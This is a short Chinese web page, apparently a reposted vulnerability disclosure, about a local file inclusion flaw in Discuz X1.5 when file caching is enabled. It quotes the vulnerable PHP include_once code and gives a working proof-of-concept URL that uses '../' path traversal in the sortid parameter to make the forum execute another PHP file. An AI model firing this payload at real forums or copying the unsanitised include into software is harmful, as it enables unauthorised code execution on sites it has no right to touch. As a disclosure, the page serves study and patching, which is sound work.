DISCUZ X1.5 本地文件包含漏洞

网站建设 2021-07-03 10:02www.dzhlxh.cn网站建设

  DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存。

  config_global.php

  $_config['cache']['type'] = ‘file’;

  function cachedata($cachenames) {

  ……

  $isfilecache = getglobal(‘config/cache/type’) == ‘file’;

  ……

  if($isfilecache) {

  $lostcaches = array();

  foreach($cachenames as $cachename) {

  if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {

  $lostcaches[] = $cachename;

  }

  }

  ……

  }

  地址:

  http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc

  http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried

  执行了 api/uc.php 页面代码了。

  作者: Jannock

Copyright © 2016-2025 www.dzhlxh.cn 金源码 版权所有 Power by

网站模板下载|网络推广|微博营销|seo优化|视频营销|网络营销|微信营销|网站建设|织梦模板|小程序模板